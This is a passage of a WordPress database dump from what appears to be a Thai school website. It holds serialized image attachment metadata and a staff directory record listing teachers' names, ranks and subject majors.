(1850,602,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1774;s:6:\"height\";i:2364;s:4:\"file\";s:23:\"2024/08/S__16285737.jpg\";s:8:\"filesize\";i:811592;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__16285737-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21465;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__16285737-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131579;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285737-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8715;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__16285737-768x1023.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131543;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"S__16285737-1153x1536.jpg\";s:5:\"width\";i:1153;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:244051;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"S__16285737-1537x2048.jpg\";s:5:\"width\";i:1537;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:383660;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285737-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17023;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1851,603,'_wp_attached_file','2024/08/ครูวีรวัฒน์.jpg'),
(1852,603,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:2560;s:4:\"file\";s:45:\"2024/08/ครูวีรวัฒน์.jpg\";s:8:\"filesize\";i:1039193;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"ครูวีรวัฒน์-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25842;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"ครูวีรวัฒน์-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:223612;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"ครูวีรวัฒน์-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9440;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"ครูวีรวัฒน์-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:223612;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:47:\"ครูวีรวัฒน์-1152x1536.jpg\";s:5:\"width\";i:1152;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:437031;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:47:\"ครูวีรวัฒน์-1536x2048.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:678208;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"ครูวีรวัฒน์-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22887;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1853,604,'_wp_attached_file','2024/08/ครูปรีชา.jpg'),
(1854,604,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1109;s:6:\"height\";i:1479;s:4:\"file\";s:36:\"2024/08/ครูปรีชา.jpg\";s:8:\"filesize\";i:422170;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"ครูปรีชา-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26078;}s:5:\"large\";a:5:{s:4:\"file\";s:37:\"ครูปรีชา-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165236;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"ครูปรีชา-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10588;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"ครูปรีชา-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165236;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:36:\"ครูปรีชา-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22844;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1855,593,'_tmm_head','a:11:{i:0;a:15:{s:14:\"_tmm_firstname\";s:36:\"นางสิตาพัชร์\";s:13:\"_tmm_lastname\";s:12:\"มาลี\";s:8:\"_tmm_job\";s:76:\"ครู วิทยะฐานะชำนาญการพิเศษ\";s:9:\"_tmm_desc\";s:55:\"วิชาเอก วิทยาศาสตร์\";s:10:\"_tmm_photo\";s:68:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__16285729.jpg\";s:14:\"_tmm_photo_url\";s:0:\"\";s:13:\"_tmm_sc_type1\";s:8:\"facebook\";s:14:\"_tmm_sc_title1\";s:0:\"\";s:12:\"_tmm_sc_url1\";s:0:\"\";s:13:\"_tmm_sc_type2\";s:9:\"instagram\";s:14:\"_tmm_sc_title2\";s:0:\"\";s:12:\"_tmm_sc_url2\";s:0:\"\";s:13:\"_tmm_sc_type3\";s:5:\"phone\";s:14:\"_tmm_sc_title3\";s:0:\"\";s:12:\"_tmm_sc_url3\";s:0:\"\";}i:1;a:15:{s:14:\"_tmm_firstname\";s:24:\"นางกัลยา\";s:13:\"_tmm_lastname\";s:21:\"คำสิงห์\";s:8:\"_tmm_job\";s:76:\"ครู วิทยะฐานะชำนาญการพิเศษ\";s:9:\"_tmm_desc\";s:40:\"วิชาเอก ปฐมวัย\";s:10:\"_tmm_photo\";s:63:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/234156.jpg\";s:14:\"_tmm_photo_url\";s:0:\"\";s:13:\"_tmm_sc_type1\";s:8:\"facebook\";s:14:\"_tmm_sc_title1\";s:0:\"\";s:12:\"_tmm_sc_url1\";s:0:\"\";s:13:\"_tmm_sc_type2\";s:9:\"instagram\";s:14:\"_tmm_sc_title2\";s:0:\"\";s:12:\"_tmm_sc_url2\";s:0:\"\";s:13:\"_tmm_sc_type3\";s:5:\"phone\";s:14:\"_tmm_sc_title3\";s:0:\"\";s:12:\"_tmm_sc_url3\";s:0:\"\";}i:2;a:15:{s:14:\"_tmm_firstname\";s:30:\"นางปิยธิดา\";s:13:\"_tmm_lastname\";s:33:\"ศรีธัญรัตน์\";s:8:\"_tmm_job\";s:76:\"ครู วิทยะฐานะชำนาญการพิเศษ\";s:9:\"_tmm_desc\";s:52:\"วิชาเอก ภาษาอังกฤษ\";s:10:\"_tmm_photo\";s:68:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__16285724.jpg\";s:14:\"_tmm_photo_url\";s:0:\"\";s:13:\"_tmm_sc_type1\";s:8:\"facebook\";s:14:\"_tmm_sc_title1\";s:0:\"\";s:12:\"_tmm_sc_url1\";s:0:\"\";s:13:\"_tmm_sc_type2\";s:9:\"instagram\";s:14:\"_tmm_sc_title2\";s:0:\"\";s:12:\"_tmm_sc_url2\";s:0:\"\";s:13:\"_tmm_sc_type3\";s:5:\"phone\";s:14:\"_tmm_sc_title3\";s:0:\"\";s:12:\"_tmm_sc_url3\";s:0:\"\";}i:3;a:15:{s:14:\"_tmm_firstname\";s:45:\"นางณัฐศิมาภารณ์\";s:13:\"_tmm_lastname\";s:24:\"ชัยกวงชา\";s:8:\"_tmm_job\";s:61:\"ครู วิทยะฐานะชำนาญการ\";s:9:\"_tmm_desc\";s:40:\"วิชาเอก ปฐมวัย\";s:10:\"_tmm_photo\";s:68:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__16285735.jpg\";s:14:\"_tmm_photo_url\";s:0:\"\";s:13:\"_tmm_sc_type1\";s:8:\"facebook\";s:14:\"_tmm_sc_title1\";s:0:\"\";s:12:\"_tmm_sc_url1\";s:0:\"\";s:13:\"_tmm_sc_type2\";s:9:\"instagram\";s:14:\"_tmm_sc_title2\";s:0:\"\";s:12:\"_tmm_sc_url2\";s:0:\"\";s:13:\"_tmm_sc_type3\";s:5:\"phone\";s:14:\"_tmm_sc_title3\";s:0:\"\";s:12:\"_tmm_sc_url3\";s:0:\"\";}i:4;a:15:{s:14:\"_tmm_firstname\";s:24:\"นายวิรุต\";s:13:\"_tmm_lastname\";s:21:\"อินสมาน\";s:8:\"_tmm_job\";s:61:\"ครู วิทยะฐานะชำนาญการ\";s:9:\"_tmm_desc\";s:43:\"วิชาเอก พลศึกษา\";s:10:\"_tmm_photo\";s:68:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__16285737.jpg\";s:14:\"_tmm_photo_url\";s:0:\"\";s:13:\"_tmm_sc_type1\";s:8:\"facebook\";s:14:\"_tmm_sc_title1\";s:0:\"\";s:12:\"_tmm_sc_url1\";s:0:\"\";s:13:\"_tmm_sc_type2\";s:9:\"instagram\";s:14:\"_tmm_sc_title2\";s:0:\"\";s:12:\"_tmm_sc_url2\";s:0:\"\";s:13:\"_tmm_sc_type3\";s:5:\"phone\";s:14:\"_tmm_sc_title3\";s:0:\"\";s:12:\"_tmm_sc_url3\";s:0:\"\";}i:5;a:15:{s:14:\"_tmm_firstname\";s:30:\"นางสุทธิตา\";s:13:\"_tmm_lastname\";s:24:\"ยวนพันธ์\";s:8:\"_tmm_job\";s:61:\"ครู วิทยะฐานะชำนาญการ\";s:9:\"_tmm_desc\";s:53:\"วิชาเอก  ภาษาอังกฤษ\";s:10:\"_tmm_photo\";s:68:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__16285728.jpg\";s:14:\"_tmm_photo_url\";s:0:\"\";s:13:\"_tmm_sc_type1\";s:8:\"facebook\";s:14:\"_tmm_sc_title1\";s:0:\"\";s:12:\"_tmm_sc_url1\";s:0:\"\";s:13:\"_tmm_sc_type2\";s:9:\"instagram\";s:14:\"_tmm_sc_title2\";s:0:\"\";s:12:\"_tmm_sc_url2\";s:0:\"\";s:13:\"_tmm_sc_type3\";s:5:\"phone\";s:14:\"_tmm_sc_title3\";s:0:\"\";s:12:\"_tmm_sc_url3\";s:0:\"\";}i:6;a:15:{s:14:\"_tmm_firstname\";s:45:\"นางสาวศินารักษ์\";s:13:\"_tmm_lastname\";s:15:\"สุขโต\";s:8:\"_tmm_job\";s:61:\"ครู วิทยะฐานะชำนาญการ\";s:9:\"_tmm_desc\";s:53:\"วิชาเอก  คณิตศาสตร์\";s:10:\"_tmm_photo\";s:68:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__16285720.jpg\";s:14:\"_tmm_photo_url\";s:0:\"\";s:13:\"_tmm_sc_type1\";s:8:\"facebook\";s:14:\"_tmm_sc_title1\";s:0:\"\";s:12:\"_tmm_sc_url1\";s:0:\"\";s:13:\"_tmm_sc_type2\";s:9:\"instagram\";s:14:\"_tmm_sc_title2\";s:0:\"\";s:12:\"_tmm_sc_url2\";s:0:\"\";s:13:\"_tmm_sc_type3\";s:5:\"phone\";s:14:\"_tmm_sc_title3\";s:0:\"\";s:12:\"_tmm_sc_url3\";s:0:\"\";}i:7;a:15:{s:14:\"_tmm_firstname\";s:42:\"นางสาวปิยรัตน์\";s:13:\"_tmm_lastname\";s:21:\"ไชยโคตร\";s:8:\"_tmm_job\";s:10:\"ครู \";s:9:\"_tmm_desc\";s:44:\"วิชาเอก  ภาษาไทย\";s:10:\"_tmm_photo\";s:68:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__16285726.jpg\";s:14:\"_tmm_photo_url\";s:0:\"\";s:13:\"_tmm_sc_type1\";s:8:\"facebook\";s:14:\"_tmm_sc_title1\";s:0:\"\";s:12:\"_tmm_sc_url1\";s:0:\"\";s:13:\"_tmm_sc_type2\";s:9:\"instagram\";s:14:\"_tmm_sc_title2\";s:0:\"\";s:12:\"_tmm_sc_url2\";s:0:\"\";s:13:\"_tmm_sc_type3\";s:5:\"phone\";s:14:\"_tmm_sc_title3\";s:0:\"\";s:12:\"_tmm_sc_url3\";s:0:\"\";}i:8;a:15:{s:14:\"_tmm_firstname\";s:26:\"นายปรีชา  \";s:13:\"_tmm_lastname\";s:24:\"ศรีลาตรี\";s:8:\"_tmm_job\";s:9:\"ครู\";s:9:\"_tmm_desc\";s:56:\"วิชาเอก  คอมพิวเตอร์\";s:10:\"_tmm_photo\";s:81:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ครูปรีชา.jpg\";s:14:\"_tmm_photo_url\";s:0:\"\";s:13:\"_tmm_sc_type1\";s:8:\"facebook\";s:14:\"_tmm_sc_title1\";s:0:\"\";s:12:\"_tmm_sc_url1\";s:0:\"\";s:13:\"_tmm_sc_type2\";s:9:\"instagram\";s:14:\"_tmm_sc_title2\";s:0:\"\";s:12:\"_tmm_sc_url2\";s:0:\"\";s:13:\"_tmm_sc_type3\";s:5:\"phone\";s:14:\"_tmm_sc_title3\";s:0:\"\";s:12:\"_tmm_sc_url3\";s:0:\"\";}i:9;a:15:{s:14:\"_tmm_firstname\";s:33:\"นางสาวกนกอร\";s:13:\"_tmm_lastname\";s:27:\"บุญศักดิ์\";s:8:\"_tmm_job\";s:30:\"ครูผู้ช่วย\";s:9:\"_tmm_desc\";s:56:\"วิชาเอก  วิทยาศาสตร์\";s:10:\"_tmm_photo\";s:68:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__16285733.jpg\";s:14:\"_tmm_photo_url\";s:0:\"\";s:13:\"_tmm_sc_type1\";s:8:\"facebook\";s:14:\"_tmm_sc_title1\";s:0:\"\";s:12:\"_tmm_sc_url1\";s:0:\"\";s:13:\"_tmm_sc_type2\";s:9:\"instagram\";s:14:\"_tmm_sc_title2\";s:0:\"\";s:12:\"_tmm_sc_url2\";s:0:\"\";s:13:\"_tmm_sc_type3\";s:5:\"phone\";s:14:\"_tmm_sc_title3\";s:0:\"\";s:12:\"_tmm_sc_url3\";s:0:\"\";}i:10;a:15:{s:14:\"_tmm_firstname\";s:39:\"นางสาวสุประภา\";s:13:\"_tmm_lastname\";s:18:\"ขันไชย\";s:8:\"_tmm_job\";s:75:\"เจ้าหน้าที่ธุรการโรงเรียน\";s:9:\"_tmm_desc\";s:0:\"\";s:10:\"_tmm_photo\";s:68:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__16285721.jpg\";s:14:\"_tmm_photo_url\";s:0:\"\";s:13:\"_tmm_sc_type1\";s:8:\"facebook\";s:14:\"_tmm_sc_title1\";s:0:\"\";s:12:\"_tmm_sc_url1\";s:0:\"\";s:13:\"_tmm_sc_type2\";s:9:\"instagram\";s:14:\"_tmm_sc_title2\";s:0:\"\";s:12:\"_tmm_sc_url2\";s:0:\"\";s:13:\"_tmm_sc_type3\";s:5:\"phone\";s:14:\"_tmm_sc_title3\";s:0:\"\";s:12:\"_tmm_sc_url3\";s:0:\"\";}}'),
(1856,593,'_tmm_color','#333333'),
(1857,593,'_tmm_columns','3'),
(1858,593,'_tmm_original_font','yes'),
(1859,593,'_tmm_display_order','default'),
(1860,593,'_tmm_piclink_beh','new'),
(1861,605,'_edit_lock','1751427983:1'),
(1862,605,'_edit_last','1'),
(1863,605,'title_style','default'),
(1864,605,'_title_style','field_5d1a0217cf408'),
(1865,606,'title_style','default'),
(1866,606,'_title_style','field_5d1a0217cf408'),
(1868,608,'title_style','default'),
(1869,608,'_title_style','field_5d1a0217cf408'),
(1870,16,'_wp_old_date','2024-08-06'),
(1872,17,'_wp_old_date','2024-08-06'),
(1874,553,'_wp_old_date','2024-08-06'),
(1876,554,'_wp_old_date','2024-08-06'),
(1878,18,'_wp_old_date','2024-08-06'),
(1880,19,'_wp_old_date','2024-08-06'),
(1882,20,'_wp_old_date','2024-08-06'),
(1884,609,'_edit_lock','1723015161:1'),
(1885,610,'_wp_attached_file','2024/08/S__62119951.jpg'),
(1886,610,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__62119951.jpg\";s:8:\"filesize\";i:504397;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__62119951-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15184;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__62119951-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134226;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__62119951-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7143;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__62119951-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81401;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__62119951-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:260807;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__62119951-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19878;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1887,611,'_wp_attached_file','2024/08/S__62119948_0.jpg'),
(1888,611,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119948_0.jpg\";s:8:\"filesize\";i:600390;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119948_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16347;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119948_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155627;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119948_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7457;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119948_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91713;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119948_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:306644;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119948_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21219;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1889,612,'_wp_attached_file','2024/08/S__62119966_0.jpg'),
(1890,612,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119966_0.jpg\";s:8:\"filesize\";i:378947;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119966_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12967;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119966_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99948;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119966_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6466;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119966_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61314;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119966_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:193088;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119966_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16350;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1891,613,'_wp_attached_file','2024/08/S__62119967_0.jpg'),
(1892,613,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119967_0.jpg\";s:8:\"filesize\";i:281995;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119967_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11067;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119967_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75900;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119967_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4198;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119967_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47547;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119967_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145252;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119967_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13550;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1893,614,'_wp_attached_file','2024/08/S__62119957_0.jpg'),
(1894,614,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119957_0.jpg\";s:8:\"filesize\";i:400461;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119957_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14587;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119957_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:109382;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119957_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6520;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119957_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68252;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119957_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:207638;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119957_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18511;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1895,615,'_wp_attached_file','2024/08/S__62119959_0.jpg'),
